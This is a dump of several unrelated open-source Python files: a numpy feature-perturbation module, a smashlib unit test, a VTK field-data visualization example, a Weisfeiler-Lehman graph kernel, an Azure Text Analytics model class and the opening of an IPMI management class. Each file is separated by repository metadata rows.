"""Apply the transformation to the indices.
Parameters
----------
i: int, list or np.ndarray
the indices of the elements `i`.
k: int, list
the perturbation indices.
Returns
-------
i: int, list or np.ndarray
the indices of the elements `i`.
"""
return self.reindices[i, k]
class PermutationPerturbationGeneration(PermutationPerturbation):
"""Reindice perturbation for the whole features variables."""
def __init__(self, n, m=1, seed=None):
"""Element perturbation for all permutation perturbation.
Parameters
----------
n: int
the size of the sample to create the reindices.
m: int (default=1)
the number of permutations we want to generate.
seed: int (default=Npne)
the seed to initialize and create the same reindices.
"""
self._initialization()
if seed is not None:
np.random.seed(seed)
self._format_reindices((n, m))
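# Illustrative usage (assumption, not part of the original module):
#   pert = PermutationPerturbationGeneration(n=500, m=10, seed=0)
#   feats_p = pert.apply2features(features)  # shape (500, n_feats, 10)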
class PartialPermutationPerturbationGeneration(PermutationPerturbation):
"""Reindice perturbation for the whole features variables. It can control
the proportion of the whole sample is going to be permuted.
"""
def __init__(self, n, rate_pert=1., m=1, seed=None):
"""Element perturbation for all permutation perturbation.
Parameters
----------
n: int
the size of the sample to create the reindices.
m: int (default=1)
the number of permutations we want to generate.
        seed: int (default=None)
the seed to initialize and create the same reindices.
"""
self._initialization()
if seed is not None:
np.random.seed(seed)
if rate_pert == 1.:
self._format_reindices((n, m))
else:
n_sample = int(n*rate_pert)
indices = np.random.permutation(n)[:n_sample]
reindices = np.vstack([np.arange(n) for i in xrange(m)]).T
reindices[indices] = np.vstack([np.random.permutation(n_sample)
for i in xrange(m)]).T
self.k_perturb = m
self.reindices = reindices
###############################################################################
############################# Element perturbation ############################
###############################################################################
## TODO:
class MixedFeaturePertubation(BasePerturbation):
"""An individual-column-created perturbation of individual elements."""
_categorytype = "feature"
_perturbtype = "element_mixed"
def __init__(self, perturbations):
"""The MixedFeaturePertubation is the application of different
perturbations to features.
        Parameters
        ----------
        perturbations: list
the list of pst.BasePerturbation objects.
"""
msg = "Perturbations is not a list of individual perturbation methods."
self._initialization()
if type(perturbations) != list:
raise TypeError(msg)
try:
self.typefeats = [p._perturbtype for p in perturbations]
k_perturbs = [p.k_perturb for p in perturbations]
assert all([k == k_perturbs[0] for k in k_perturbs])
self.k_perturb = k_perturbs[0]
self.perturbations = perturbations
except:
raise TypeError(msg)
def apply2features(self, features):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
assert features.shape[1] == len(self.perturbations)
## Apply individual perturbation for each features
features_p, n = [], len(features)
k_pos = list(range(self.k_perturb))
for i in range(len(self.perturbations)):
features_p_k =\
self.perturbations[i].apply2features(features[:, [i]], k_pos)
features_p_k = features_p_k.reshape((n, 1, self.k_perturb))
features_p.append(features_p_k)
features_p = np.concatenate(features_p, axis=1)
return features_p
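# Illustrative usage (assumption): the sub-perturbations must share the same
# k_perturb (here 1, so reindices is an (n, 1) integer array):
#   mixed = MixedFeaturePertubation([ContiniousIndPerturbation(0.1),
#                                    PermutationIndPerturbation(reindices)])
#   feats_p = mixed.apply2features(features)  # shape (n, 2, 1)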
########################### Individual perturbation ###########################
###############################################################################
class DiscreteIndPerturbation(BasePerturbation):
"""Discrete perturbation of a discrete feature variable."""
_categorytype = "feature"
_perturbtype = "discrete"
def __init__(self, probs):
"""The discrete individual perturbation to a feature variable.
Parameters
----------
probs: np.ndarray
the probabilities to change from a value of a category to another
value.
"""
self._initialization()
        # each row of probs must define a probability distribution
        if np.any(probs.sum(1) != 1):
            raise TypeError("Not correct probs input.")
        if probs.shape[0] != probs.shape[1]:
            raise IndexError("Probs is not a square matrix.")
self.probs = probs.cumsum(1)
def apply2features(self, feature, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
## Prepare loop
categories = np.unique(feature)
if len(categories) != len(self.probs):
msg = "Not matching dimension between probs and features."
raise IndexError(msg)
if k is None:
k = list(range(self.k_perturb))
if type(k) == int:
k = [k]
## Compute each change
feature_p = np.zeros((len(feature), len(k)))
for i_k in k:
for i in xrange(len(feature)):
r = np.random.random()
idx = np.where(feature[i] == categories)[0]
idx2 = np.where(self.probs[idx] > r)[0][0]
feature_p[i, i_k] = categories[idx2]
return feature_p
class ContiniousIndPerturbation(BasePerturbation):
"""Continious perturbation for an individual feature variable."""
_categorytype = "feature"
_perturbtype = "continious"
def __init__(self, pstd):
"""The continious individual perturbation to a feature variable.
Parameters
----------
pstd: float
the dispersion measure of the jittering.
"""
self._initialization()
self.pstd = pstd
def apply2features(self, feature, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
if k is None:
k = list(range(self.k_perturb))
if type(k) == int:
k = [k]
feature_p = np.zeros((len(feature), len(k)))
for i_k in k:
            jitter_d = np.random.random(len(feature))
            # add the scaled jitter to the original values (matching the
            # behaviour of the location jittering above)
            feature_p[:, i_k] = np.ravel(feature) + np.multiply(self.pstd,
                                                                jitter_d)
return feature_p
class PermutationIndPerturbation(BasePerturbation):
"""Reindice perturbation for an individual feature variable."""
_categorytype = "feature"
_perturbtype = "permutation_ind"
def __init__(self, reindices=None):
"""Individual feature perturbation.
Parameters
----------
reindices: np.ndarray (default=None)
the reindices to apply permutation perturbations.
"""
self._initialization()
if type(reindices) == np.ndarray:
self.reindices = reindices
self.k_perturb = reindices.shape[1]
else:
raise TypeError("Incorrect reindices.")
def apply2features(self, feature, k=None):
"""Apply perturbation to features.
Parameters
----------
features: np.ndarray or others
the element features collection to be perturbed.
k: int (default=None)
the perturbation indices.
Returns
-------
features: np.ndarray or others
the element features collection perturbated.
"""
if k is None:
k = list(range(self.k_perturb))
if type(k) == int:
k = [k]
feature_p = np.zeros((len(feature), len(k)))
for i_k in k:
feature_p[:, [i_k]] = feature[self.reindices[:, i_k]]
return feature_p
def apply2features_ind(self, feature, i, k):
"""Apply perturbation to features individually for precomputed
applications.
Parameters
----------
features: np.ndarray or others
the element features to be perturbed.
i: int or list
the element indices.
k: int or list
the perturbation indices.
Returns
-------
locations: np.ndarray or others
the element features perturbated.
"""
return feature[self.reindices[i, k]]
###############################################################################
########################### Aggregation perturbation ##########################
###############################################################################
class JitterRelationsPerturbation(BasePerturbation):
"""Jitter module to perturbe relations of the system in order of testing
methods.
"""
_categorytype = "relations"
| mit | -2,054,015,461,161,471,700 | 30.124514 | 79 | 0.535817 | false |
mattvonrocketstein/smash | tests/units/test_utils.py | 1 | 1228 | """ tests/test_utils
"""
import os
from smashlib.testing import TestCase, hijack_ipython_module, main
from smashlib.plugins.smash_completer import SmashCompleter, smash_env_complete
from smashlib.overrides import SmashTerminalInteractiveShell
from mock import Mock
hijack_ipython_module()
from IPython.testing.tools import default_config
from IPython.core.completerlib import TryNext
from IPython.testing.globalipapp import get_ipython
from smashlib.util import bash
ffile = os.path.join(os.path.dirname(__file__),
'function.sh')
class TestUtils(TestCase):
def setUp(self):
        return  # NOTE: early return leaves the mocked-shell setup below disabled
self.shell = Mock()
self.config = default_config()
self.shell.config = self.config
self.plugin = SmashCompleter(self.shell)
self.event = Mock()
def test_get_functions_from_file(self):
self.assertTrue(os.path.exists(ffile))
self.assertEqual(
['simple_function'],
bash.get_functions_from_file(ffile))
def test_run_function_from_file(self):
self.assertEqual(
bash.run_function_from_file(
'simple_function', ffile),
['simple bash function'])
if __name__ == '__main__':
main()
| mit | -5,957,990,363,373,603,000 | 31.315789 | 79 | 0.668567 | false |
hlzz/dotfiles | graphics/VTK-7.0.0/Examples/DataManipulation/Python/FinancialField.py | 1 | 8881 | #!/usr/bin/env python
# This example demonstrates the use of fields and use of
# vtkProgrammableDataObjectSource. It creates fields the hard way (as
# compared to reading a vtk field file), but shows you how to
# interface to your own raw data.
import os
import re
import vtk
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
xAxis = "INTEREST_RATE"
yAxis = "MONTHLY_PAYMENT"
zAxis = "MONTHLY_INCOME"
scalar = "TIME_LATE"
def getNumberFromLine(line):
patn = re.compile('[-+]{0,1}[\d.]+e?[-+\d]*', re.M)
val = patn.findall(line)
ret = []
for i in val:
ret.append(float(i))
return ret
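# Example (illustrative): getNumberFromLine("1.5e-2 foo -3") -> [0.015, -3.0]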
# Parse an ASCII file and manually create a field. Then construct a
# dataset from the field.
dos = vtk.vtkProgrammableDataObjectSource()
# First define the function that will parse the data.
def parseFile():
global VTK_DATA_ROOT, dos
# Use Python to read an ASCII file
file = open(os.path.join(VTK_DATA_ROOT, "Data/financial.txt"), "r")
line = file.readline()
numPts = int(getNumberFromLine(line)[0])
numLines = (numPts - 1)//8
# Get the data object's field data and allocate
# room for 4, fields
fieldData = dos.GetOutput().GetFieldData()
fieldData.AllocateArrays(4)
# read TIME_LATE - dependent variable
# search the file until an array called TIME_LATE is found
while file.readline()[:9] != "TIME_LATE":
pass
# Create the corresponding float array
timeLate = vtk.vtkFloatArray()
timeLate.SetName("TIME_LATE")
# Read the values
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
timeLate.InsertNextValue(val[j])
# Add the array
fieldData.AddArray(timeLate)
# MONTHLY_PAYMENT - independent variable
while file.readline()[:15] != "MONTHLY_PAYMENT":
pass
monthlyPayment = vtk.vtkFloatArray()
monthlyPayment.SetName("MONTHLY_PAYMENT")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
monthlyPayment.InsertNextValue(val[j])
fieldData.AddArray(monthlyPayment)
# UNPAID_PRINCIPLE - skip
while file.readline()[:16] != "UNPAID_PRINCIPLE":
pass
for i in range(0, numLines):
file.readline()
# LOAN_AMOUNT - skip
while file.readline()[:11] != "LOAN_AMOUNT":
pass
for i in range(0, numLines):
file.readline()
# INTEREST_RATE - independent variable
while file.readline()[:13] != "INTEREST_RATE":
pass
interestRate = vtk.vtkFloatArray()
interestRate.SetName("INTEREST_RATE")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
interestRate.InsertNextValue(val[j])
fieldData.AddArray(interestRate)
# MONTHLY_INCOME - independent variable
while file.readline()[:14] != "MONTHLY_INCOME":
pass
monthlyIncome = vtk.vtkFloatArray()
monthlyIncome.SetName("MONTHLY_INCOME")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
monthlyIncome.InsertNextValue(val[j])
fieldData.AddArray(monthlyIncome)
# Arrange to call the parsing function when the programmable data
# source is executed.
dos.SetExecuteMethod(parseFile)
# Create the dataset.
# DataObjectToDataSetFilter can create geometry using fields from
# DataObject's FieldData
do2ds = vtk.vtkDataObjectToDataSetFilter()
do2ds.SetInputConnection(dos.GetOutputPort())
# We are generating polygonal data
do2ds.SetDataSetTypeToPolyData()
do2ds.DefaultNormalizeOn()
# All we need is points. Assign them.
do2ds.SetPointComponent(0, xAxis, 0)
do2ds.SetPointComponent(1, yAxis, 0)
do2ds.SetPointComponent(2, zAxis, 0)
# RearrangeFields is used to move fields between DataObject's
# FieldData, PointData and CellData.
rf = vtk.vtkRearrangeFields()
rf.SetInputConnection(do2ds.GetOutputPort())
# Add an operation to "move TIME_LATE from DataObject's FieldData to
# PointData"
rf.AddOperation("MOVE", scalar, "DATA_OBJECT", "POINT_DATA")
# Force the filter to execute. This is need to force the pipeline
# to execute so that we can find the range of the array TIME_LATE
rf.Update()
# Set max to the second (GetRange returns [min,max]) of the "range of the
# array called scalar in the PointData of the output of rf"
max = rf.GetOutput().GetPointData().GetArray(scalar).GetRange()[1]
# Use an ArrayCalculator to normalize TIME_LATE
calc = vtk.vtkArrayCalculator()
calc.SetInputConnection(rf.GetOutputPort())
# Working on point data
calc.SetAttributeModeToUsePointData()
# Map scalar to s. When setting function, we can use s to
# represent the array scalar (TIME_LATE)
calc.AddScalarVariable("s", scalar, 0)
# Divide scalar by max (applies division to all components of the array)
calc.SetFunction("s / %f"%max)
# The output array will be called resArray
calc.SetResultArrayName("resArray")
# Use AssignAttribute to make resArray the active scalar field
aa = vtk.vtkAssignAttribute()
aa.SetInputConnection(calc.GetOutputPort())
aa.Assign("resArray", "SCALARS", "POINT_DATA")
aa.Update()
# construct pipeline for original population
# GaussianSplatter -> Contour -> Mapper -> Actor
popSplatter = vtk.vtkGaussianSplatter()
popSplatter.SetInputConnection(aa.GetOutputPort())
popSplatter.SetSampleDimensions(50, 50, 50)
popSplatter.SetRadius(0.05)
popSplatter.ScalarWarpingOff()
popSurface = vtk.vtkContourFilter()
popSurface.SetInputConnection(popSplatter.GetOutputPort())
popSurface.SetValue(0, 0.01)
popMapper = vtk.vtkPolyDataMapper()
popMapper.SetInputConnection(popSurface.GetOutputPort())
popMapper.ScalarVisibilityOff()
popActor = vtk.vtkActor()
popActor.SetMapper(popMapper)
popActor.GetProperty().SetOpacity(0.3)
popActor.GetProperty().SetColor(.9, .9, .9)
# This is for decoration only.
def CreateAxes():
global xAxis, yAxis, zAxis, popSplatter
# Create axes.
popSplatter.Update()
bounds = popSplatter.GetOutput().GetBounds()
axes = vtk.vtkAxes()
axes.SetOrigin(bounds[0], bounds[2], bounds[4])
axes.SetScaleFactor(popSplatter.GetOutput().GetLength()/5.0)
axesTubes = vtk.vtkTubeFilter()
axesTubes.SetInputConnection(axes.GetOutputPort())
axesTubes.SetRadius(axes.GetScaleFactor()/25.0)
axesTubes.SetNumberOfSides(6)
axesMapper = vtk.vtkPolyDataMapper()
axesMapper.SetInputConnection(axesTubes.GetOutputPort())
axesActor = vtk.vtkActor()
axesActor.SetMapper(axesMapper)
# Label the axes.
XText = vtk.vtkVectorText()
XText.SetText(xAxis)
XTextMapper = vtk.vtkPolyDataMapper()
XTextMapper.SetInputConnection(XText.GetOutputPort())
XActor = vtk.vtkFollower()
XActor.SetMapper(XTextMapper)
XActor.SetScale(0.02, .02, .02)
XActor.SetPosition(0.35, -0.05, -0.05)
XActor.GetProperty().SetColor(0, 0, 0)
YText = vtk.vtkVectorText()
YText.SetText(yAxis)
YTextMapper = vtk.vtkPolyDataMapper()
YTextMapper.SetInputConnection(YText.GetOutputPort())
YActor = vtk.vtkFollower()
YActor.SetMapper(YTextMapper)
YActor.SetScale(0.02, .02, .02)
YActor.SetPosition(-0.05, 0.35, -0.05)
YActor.GetProperty().SetColor(0, 0, 0)
ZText = vtk.vtkVectorText()
ZText.SetText(zAxis)
ZTextMapper = vtk.vtkPolyDataMapper()
ZTextMapper.SetInputConnection(ZText.GetOutputPort())
ZActor = vtk.vtkFollower()
ZActor.SetMapper(ZTextMapper)
ZActor.SetScale(0.02, .02, .02)
ZActor.SetPosition(-0.05, -0.05, 0.35)
ZActor.GetProperty().SetColor(0, 0, 0)
return axesActor, XActor, YActor, ZActor
axesActor, XActor, YActor, ZActor = CreateAxes()
# Create the render window, renderer, interactor
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetWindowName("vtk - Field Data")
renWin.SetSize(500, 500)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
ren.AddActor(axesActor)
ren.AddActor(XActor)
ren.AddActor(YActor)
ren.AddActor(ZActor)
ren.AddActor(popActor)
ren.SetBackground(1, 1, 1)
# Set the default camera position
camera = vtk.vtkCamera()
camera.SetClippingRange(.274, 13.72)
camera.SetFocalPoint(0.433816, 0.333131, 0.449)
camera.SetPosition(-1.96987, 1.15145, 1.49053)
camera.SetViewUp(0.378927, 0.911821, 0.158107)
ren.SetActiveCamera(camera)
# Assign the camera to the followers.
XActor.SetCamera(camera)
YActor.SetCamera(camera)
ZActor.SetCamera(camera)
iren.Initialize()
renWin.Render()
iren.Start()
| bsd-3-clause | -383,774,845,512,799,740 | 29.492908 | 73 | 0.695079 | false |
nickgentoo/scikit-learn-graph | skgraph/kernel/WLOrthoGraphKernel.py | 1 | 15954 | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 3 12:04:44 2015
Copyright 2015 Nicolo' Navarin
This file is part of scikit-learn-graph.
scikit-learn-graph is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
scikit-learn-graph is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with scikit-learn-graph. If not, see <http://www.gnu.org/licenses/>.
The code is from the following source.
Weisfeiler_Lehman graph kernel.
Python implementation of Nino Shervashidze Matlab code at:
http://mlcb.is.tuebingen.mpg.de/Mitarbeiter/Nino/Graphkernels/
Author : Sandro Vega Pons
License:
"""
import numpy as np
import networkx as nx
import copy
import math
from KernelTools import convert_to_sparse_matrix
from graphKernel import GraphKernel
from scipy.sparse import dok_matrix
from sklearn import preprocessing as pp
class WLOrthoGraphKernel(GraphKernel):
"""
Weisfeiler_Lehman graph kernel.
"""
def __init__(self, r = 1, normalization = False):
self.h=r
self.normalization=normalization
self.__startsymbol='!' #special symbols used in encoding
self.__conjsymbol='#'
self.__endsymbol='?'
self.__fsfeatsymbol='*'
self.__version=0
self.__contextsymbol='@'
def kernelFunction(self, g_1, g_2):
"""Compute the kernel value (similarity) between two graphs.
Parameters
----------
g1 : networkx.Graph
First graph.
g2 : networkx.Graph
Second graph.
h : interger
Number of iterations.
nl : boolean
Whether to use original node labels. True for using node labels
saved in the attribute 'node_label'. False for using the node
degree of each node as node attribute.
Returns
-------
k : The similarity value between g1 and g2.
"""
gl = [g_1, g_2]
        # computeGrams returns one Gram matrix (as nested lists) per WL
        # iteration; the kernel value is the sum of the pairwise entries
        return sum(gram[0][1] for gram in self.computeGrams(gl))
def transform(self, graph_list):
"""
TODO
"""
n = len(graph_list) #number of graphs
# list of the orthogonalized phi: phis[i] is the phi of the i-th iteration of the WL test.
phis=[]
for i in range(self.h+1):
phis.append({})
NodeIdToLabelId = [0] * n # NodeIdToLabelId[i][j] is labelid of node j in graph i
label_lookup = {} #map from features to corresponding id
label_counter = 0 #incremental value for label ids
for i in range(n): #for each graph
NodeIdToLabelId[i] = {}
for j in graph_list[i].nodes(): #for each node
if not label_lookup.has_key(graph_list[i].node[j]['label']):#update label_lookup and label ids from first iteration that consider node's labels
label_lookup[graph_list[i].node[j]['label']] = label_counter
NodeIdToLabelId[i][j] = label_counter
label_counter += 1
else:
NodeIdToLabelId[i][j] = label_lookup[graph_list[i].node[j]['label']]
feature=self.__fsfeatsymbol+str(label_lookup[graph_list[i].node[j]['label']])
if not phis[0].has_key((i,feature)):
phis[0][(i,feature)]=0.0
phis[0][(i,feature)]+=1.0
# here we have phi[0]
### MAIN LOOP
        it = 1  # phis[0] already holds the original-label features
        NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId) #labels id of next iteration
while it <= self.h: #each iteration compute the next labellings (that are contexts of the previous)
label_lookup = {}
for i in range(n): #for each graph
for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
neighbors=[]
for u in graph_list[i].neighbors(j):
neighbors.append(NodeIdToLabelId[i][u])
neighbors.sort() #sorting neighbours
long_label_string=str(NodeIdToLabelId[i][j])+self.__startsymbol #compute new labels id
for u in neighbors:
long_label_string+=str(u)+self.__conjsymbol
long_label_string=long_label_string[:-1]+self.__endsymbol
if not label_lookup.has_key(long_label_string):
label_lookup[long_label_string] = label_counter
NewNodeIdToLabelId[i][j] = label_counter
label_counter += 1
else:
NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
feature=self.__fsfeatsymbol+str(NewNodeIdToLabelId[i][j])
if not phis[it].has_key((i,feature)):
phis[it][(i,feature)]=0.0
phis[it][(i,feature)]+=1.0
# here we have phi[it]
NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId) #update current labels id
it = it + 1
ves = [convert_to_sparse_matrix(phi) for phi in phis]
if self.normalization:
ves = [pp.normalize(ve, norm='l2', axis=1) for ve in ves]
return ves
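    # Illustrative usage (assumption, not part of the original module): graphs
    # is a list of networkx graphs whose nodes carry a 'label' attribute:
    #   kernel = WLOrthoGraphKernel(r=2, normalization=True)
    #   phis = kernel.transform(graphs)      # h+1 sparse feature matrices
    #   grams = kernel.computeGrams(graphs)  # one Gram matrix per WL iteration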
# def transform(self, graph_list):
# """
# TODO
# """
# n = len(graph_list) #number of graphs
#
# phi={} #dictionary representing the phi vector for each graph. phi[r][c]=v each row is a graph. each column is a feature
#
# NodeIdToLabelId = [dict() for x in range(n)] # NodeIdToLabelId[i][j] is labelid of node j in graph i
# label_lookup = {} #map from features to corresponding id
# label_counter = long(1) #incremental value for label ids
#
# for i in range(n): #for each graph
# #NodeIdToLabelId[i] = {}
# #nx.draw(graph_list[i])
#
#
# for j in graph_list[i].nodes(): #for each node
# if not label_lookup.has_key(graph_list[i].node[j]['label']):#update label_lookup and label ids from first iteration that consider node's labels
# label_lookup[graph_list[i].node[j]['label']] = label_counter
# NodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NodeIdToLabelId[i][j] = label_lookup[graph_list[i].node[j]['label']]
#
# feature=self.__fsfeatsymbol+str(label_lookup[graph_list[i].node[j]['label']])
# if not phi.has_key((i,feature)):
# phi[(i,feature)]=0.0
# phi[(i,feature)]+=1.0
#
# ### MAIN LOOP
# it = 0
# NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId) #labels id of nex iteration
#
# while it < self.h: #each iteration compute the next labellings (that are contexts of the previous)
# label_lookup = {}
#
# for i in range(n): #for each graph
# for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
# neighbors=[]
# for u in graph_list[i].neighbors(j):
# neighbors.append(NodeIdToLabelId[i][u])
# neighbors.sort() #sorting neighbours
#
# long_label_string=str(NodeIdToLabelId[i][j])+self.__startsymbol #compute new labels id
# for u in neighbors:
# long_label_string+=str(u)+self.__conjsymbol
# long_label_string=long_label_string[:-1]+self.__endsymbol
#
# if not label_lookup.has_key(long_label_string):
# label_lookup[long_label_string] = label_counter
# NewNodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
#
# feature=self.__fsfeatsymbol+str(NewNodeIdToLabelId[i][j])
# if not phi.has_key((i,feature)):
# phi[(i,feature)]=0.0
# phi[(i,feature)]+=1.0
#
#
# NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId) #update current labels id
# it = it + 1
# #print phi
# return convert_to_sparse_matrix(phi)
# def transform(self, graph_list):
# """
# TODO
# """
# n = len(graph_list) #number of graphs
#
# phi={} #dictionary representing the phi vector for each graph. phi[r][c]=v each row is a graph. each column is a feature
# #phi=dok_matrix()
# NodeIdToLabelId = [0] * n # NodeIdToLabelId[i][j] is labelid of node j in graph i
# label_lookup = {} #map from features to corresponding id
# label_counter = 0 #incremental value for label ids
#
# for i in xrange(n): #for each graph
# NodeIdToLabelId[i] = {}
#
# for j in graph_list[i].nodes():
# enc=graph_list[i].node[j]['label'] #"0"+
# if enc not in label_lookup:#update label_lookup and label ids
# label_lookup[enc] = label_counter
# NodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NodeIdToLabelId[i][j] = label_lookup[enc]
# #print enc, label_lookup[enc]
# if (i,label_lookup[enc]) not in phi:
# phi[i,label_lookup[enc]]=0
# phi[i,label_lookup[enc]]+=1
#
# ### MAIN LOOP
# it = 0
# NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId)
# #label_lookup = {}
#
# while it < self.h:
# label_lookup = {}
#
# for i in xrange(n): #for each graph
# for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
# neighbors=[]
# for u in graph_list[i].neighbors(j):
# #print u,
# neighbors.append(NodeIdToLabelId[i][u])
# neighbors.sort()
# #print
# long_label_string=str(NodeIdToLabelId[i][j])#str(it+1)+self.__startsymbol+
# for u in neighbors:
# long_label_string+=self.__conjsymbol+str(u)
# #long_label_string=long_label_string[:-1]+self.__endsymbol
# if long_label_string not in label_lookup:
# label_lookup[long_label_string] = label_counter
# NewNodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
# print long_label_string, NewNodeIdToLabelId[i][j]
#
# if (i,NewNodeIdToLabelId[i][j]) not in phi:
# phi[i,NewNodeIdToLabelId[i][j]]=0
# phi[i,NewNodeIdToLabelId[i][j]]+=1
#
# NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId)
# it = it + 1
# #return dok_matrix(phi.todense()).tocsr()
# return convert_to_sparse_matrix(phi)
# def transform(self, graph_list):
# """
# TODO
# """
# n = len(graph_list) #number of graphs
#
# phi={} #dictionary representing the phi vector for each graph. phi[r][c]=v each row is a graph. each column is a feature
#
# NodeIdToLabelId = [0] * n # NodeIdToLabelId[i][j] is labelid of node j in graph i
# label_lookup = {} #map from features to corresponding id
# label_counter = 1 #incremental value for label ids
#
# for i in range(n): #for each graph
# NodeIdToLabelId[i] = {}
#
# for j in graph_list[i].nodes():
# #print graph_list[i].node[j]['label']
# if not label_lookup.has_key("0|"+str(graph_list[i].node[j]['label'])):#update label_lookup and label ids
# label_lookup["0|"+str(graph_list[i].node[j]['label'])] = label_counter
# NodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NodeIdToLabelId[i][j] = label_lookup["0|"+str(graph_list[i].node[j]['label'])]
#
# if not phi.has_key((i,label_lookup["0|"+str(graph_list[i].node[j]['label'])])):
# phi[(i,label_lookup["0|"+str(graph_list[i].node[j]['label'])])]=0
# phi[(i,label_lookup["0|"+str(graph_list[i].node[j]['label'])])]+=1
#
# ### MAIN LOOP
# it = 0
# NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId)
# #NewNodeIdToLabelId =[0] * n
# while it < self.h:
# label_lookup = {}
#
# for i in range(n): #for each graph
# for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
# neighbors=[]
# for u in graph_list[i].neighbors(j):
# #print u
# neighbors.append(NodeIdToLabelId[i][u])
# neighbors.sort()
# if len(neighbors)==0:
# print "Empty neighbors"
# #MODIFICATO RISPETTO a TESSELLI str(it)+self.__startsymbol+
# long_label_string=str(it+1)+"|"+str(NodeIdToLabelId[i][j])+self.__startsymbol
# for u in neighbors:
# long_label_string+=str(u)+self.__conjsymbol
# #long_label_string=long_label_string[:-1]+self.__endsymbol
# long_label_string=long_label_string[:-1]+self.__endsymbol
#
# if len(neighbors)==0:
# print long_label_string
#
# if not label_lookup.has_key(long_label_string):
# label_lookup[long_label_string] = label_counter
# NewNodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
#
# if not phi.has_key((i,NewNodeIdToLabelId[i][j])):
# phi[(i,NewNodeIdToLabelId[i][j])]=0
# phi[(i,NewNodeIdToLabelId[i][j])]+=1
#
# NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId)
# it = it + 1
# return convert_to_sparse_matrix(phi)
# def __normalization(self, gram):
# """
# TODO
# """
# if self.normalization:
# diagonal=np.diag(gram)
# a=np.tile(diagonal,(gram.shape[0],1))
# b=diagonal.reshape((gram.shape[0],1))
# b=np.tile(b,(1,gram.shape[1]))
#
# return gram/np.sqrt(a*b)
# else :
# return gram
def computeKernelMatrixTrain(self,Graphs):
return self.computeGrams(Graphs)
def computeGrams(self,g_it,ps=None):
if ps is None:
ps=self.transform(g_it)
return [precomputed.dot(precomputed.T).todense().tolist() for precomputed in ps]
| gpl-3.0 | 6,825,893,100,655,079,000 | 41.772118 | 160 | 0.521938 | false |
Azure/azure-sdk-for-python | sdk/cognitiveservices/azure-cognitiveservices-language-textanalytics/azure/cognitiveservices/language/textanalytics/models/document_statistics.py | 1 | 1220 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DocumentStatistics(Model):
"""DocumentStatistics.
:param characters_count: Number of text elements recognized in the
document.
:type characters_count: int
:param transactions_count: Number of transactions for the document.
:type transactions_count: int
"""
_attribute_map = {
'characters_count': {'key': 'charactersCount', 'type': 'int'},
'transactions_count': {'key': 'transactionsCount', 'type': 'int'},
}
def __init__(self, **kwargs):
super(DocumentStatistics, self).__init__(**kwargs)
self.characters_count = kwargs.get('characters_count', None)
self.transactions_count = kwargs.get('transactions_count', None)
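# Illustrative usage (assumption, not part of the generated code):
#   stats = DocumentStatistics(characters_count=120, transactions_count=1)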
| mit | 2,335,371,021,633,898,500 | 35.969697 | 76 | 0.605738 | false |
stroucki/tashi | src/zoni/hardware/ipmi.py | 2 | 3580 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# $Id$
#
import subprocess
import logging
from systemmanagementinterface import SystemManagementInterface
#class systemmagement():
#def __init__(self, proto):
#self.proto = proto
class Ipmi(SystemManagementInterface):
